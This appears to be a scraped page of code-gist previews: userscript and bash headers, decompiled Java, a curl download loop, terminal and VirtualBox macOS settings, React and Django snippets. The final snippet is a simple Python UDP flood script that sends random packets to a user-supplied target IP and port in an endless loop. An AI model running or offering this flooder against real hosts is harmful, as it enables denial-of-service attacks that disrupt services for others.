This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// ==UserScript== | |
// @name Disquz auto full mode | |
// @namespace http://mewx.org/ | |
// @version 0.1 | |
// @description Automatically load the full text version. | |
// @author MewX | |
// @match https://www.oursteps.com.au/bbs/archiver/* | |
// @match http://www.oursteps.com.au/bbs/archiver/* | |
// @match https://oursteps.co/bbs/archiver/* | |
// @match http://oursteps.co/bbs/archiver/* |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
######################### | |
# | |
# NAME: | |
# downsampler-threaded.sh - A Bash script to automate resampling of 24 bit FLAC files using multiple threads. | |
# | |
# SYNOPSIS: | |
# downsampler-threaded.sh [OPTION [ARGUMENT]...] [--] FILE_OR_FOLDER [FILE_OR_FOLDER...] | |
# |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package com.b.a.a.a.c; | |
import com.b.a.a.a; | |
import com.b.a.a.a.b.b; | |
import java.util.WeakHashMap; | |
public class a implements a { | |
private static WeakHashMap<Object, byte[]> b = (WeakHashMap)new WeakHashMap<>(); | |
public static Object a(byte[] paramArrayOfbyte) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl -b cookies.txt -L '<URL from developer tool>' -C - --retry 999 --retry-max-time 0 -o movie.mkv | |
# OR repeatively | |
while true; do curl -b cookies.txt -L '<URL from developer tool>' -C - --retry 999 --retry-max-time 0 -o movie.mkv; date; sleep 5; done |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// This file was initially generated by Windows Terminal 1.2.2381.0 | |
// It should still be usable in newer versions, but newer versions might have additional | |
// settings, help text, or changes that you will not see unless you clear this file | |
// and let us generate a new one for you. | |
// To view the default settings, hold "alt" while clicking on the "Settings" button. | |
// For documentation on these settings, see: https://aka.ms/terminal-documentation | |
{ | |
"$schema": "https://aka.ms/terminal-profiles-schema", |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
gsettings set org.gnome.desktop.interface enable-animations false |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{/* Copied from: https://github.com/facebook/react-native/issues/950#issuecomment-380490025 */} | |
<View style={{flex: 1, flexDirection: 'row'}}> | |
<Image | |
resizeMode='contain' | |
style={{ | |
flex: 1, | |
width: null, | |
height: null, | |
aspectRatio: 926/606}} | |
source={Images[status]} /> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
vboxmanage modifyvm "MacOS 10.14" --cpuidset 00000001 000106e5 00100800 0098e3fd bfebfbff | |
vboxmanage setextradata "MacOS 10.14" "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "iMac11,3" | |
vboxmanage setextradata "MacOS 10.14" "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "1.0" | |
vboxmanage setextradata "MacOS 10.14" "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "Iloveapple" | |
vboxmanage setextradata "MacOS 10.14" "VBoxInternal/Devices/smc/0/Config/DeviceKey" "ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc" | |
vboxmanage setextradata "MacOS 10.14" "VBoxInternal/Devices/smc/0/Config/GetKeyFromRealSMC" 1 | |
vboxmanage setextradata "MacOS 10.14" VBoxInternal2/EfiGraphicsResolution 1280x800 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
''' | |
given a Model with: | |
category = models.CharField(max_length=32, choices=CATEGORY_CHOICES) | |
pubdate = models.DateTimeField(default=datetime.now) | |
<other fields> | |
Fetch the item from each category with the latest pubdate. | |
''' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket #Imports needed libraries | |
import random | |
sock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) #Creates a socket | |
bytes=random._urandom(1024) #Creates packet | |
ip=raw_input('Target IP: ') #The IP we are attacking | |
port=input('Port: ') #Port we direct to attack | |
while 1: #Infinitely loops sending packets to the port until the program is exited. | |
sock.sendto(bytes,(ip,port)) |